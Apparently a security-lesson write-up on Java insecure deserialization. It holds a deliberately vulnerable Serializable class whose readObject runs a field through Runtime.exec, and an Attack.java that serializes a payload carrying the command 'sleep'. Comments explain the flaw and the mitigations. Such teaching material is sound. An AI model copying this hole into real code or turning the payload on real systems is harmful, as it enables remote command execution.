Insecure Deserialization
VulnerableTaskHolder.java
package org.dummy.insecure.framework;
import java.io.*;
import java.time.LocalDateTime;
/**
 * Deliberately vulnerable Serializable class used to demonstrate insecure
 * deserialization. Do NOT copy this pattern: {@code readObject} below executes
 * the {@code taskAction} field as an OS command while the object is still being
 * read from the stream, so whoever can supply a serialized instance gets
 * command execution on the JVM that calls {@code ObjectInputStream.readObject()}.
 */
public class VulnerableTaskHolder implements Serializable {
// NOTE(review): this field is not `final`, and the Java serialization spec only
// honours a serialVersionUID that is static, final and long; otherwise a default
// UID is computed from the class shape. A payload only deserializes when the
// attacker's copy of the class yields the same UID as the target's, so if you
// need it pinned to 2 declare it `private static final long`.
private static long serialVersionUID = 2;
// Only stored; nothing in this class reads it back.
private String taskName;
// Attacker-controlled: restored from the untrusted stream and then passed
// verbatim to Runtime.exec in readObject.
private String taskAction;
// Set at construction time; also part of the serialized state (not transient).
private LocalDateTime requestedExecutionTime;
/**
 * @param taskName   label for the task
 * @param taskAction command string that will be executed when an instance is deserialized
 */
public VulnerableTaskHolder(String taskName, String taskAction){
super();
this.taskName = taskName;
this.taskAction = taskAction;
this.requestedExecutionTime = LocalDateTime.now();
}
/**
 * Custom deserialization hook, found reflectively by ObjectInputStream.
 * The vulnerability: right after the fields are restored from the stream,
 * taskAction is handed to Runtime.exec. The sink is reached inside
 * readObject(), i.e. before the caller can cast, validate or reject the
 * object, and nothing here (no type check, no ObjectInputFilter / JEP 290
 * allow-list) stands between the bytes and the command.
 * Mitigation for real code: never natively deserialize untrusted input;
 * if unavoidable, install an ObjectInputFilter allow-list and keep
 * readObject free of side effects.
 */
private void readObject( ObjectInputStream stream) throws Exception{
// Populates taskName, taskAction and requestedExecutionTime from the stream.
stream.defaultReadObject();
// Runtime.exec(String) tokenizes the string on whitespace into a program plus
// arguments, so the attacker picks the binary, not just its parameters.
Runtime.getRuntime().exec(taskAction);
}
}
Attack.java (writes the malicious serialized object to a file named `serial`; the command itself only runs when a target later deserializes that file):
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import org.dummy.insecure.framework.VulnerableTaskHolder;
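public class Attack {
    /**
     * Serializes a VulnerableTaskHolder whose taskAction is "sleep" and writes
     * it to the file "serial" in the working directory.
     * <p>
     * Nothing in this program executes the command; the string is only data
     * here. It becomes a command when a target JVM deserializes the file and
     * VulnerableTaskHolder's readObject hands it to Runtime.exec.
     *
     * @param args ignored
     * @throws Exception if the payload file cannot be created or written
     */
    public static void main(String[] args) throws Exception {
        VulnerableTaskHolder vulnObj = new VulnerableTaskHolder("dyn", "sleep");
        // try-with-resources closes both streams even if writeObject throws
        // (the original only closed on the success path).
        try (FileOutputStream fos = new FileOutputStream("serial");
             ObjectOutputStream os = new ObjectOutputStream(fos)) {
            os.writeObject(vulnObj);
        }
    }
}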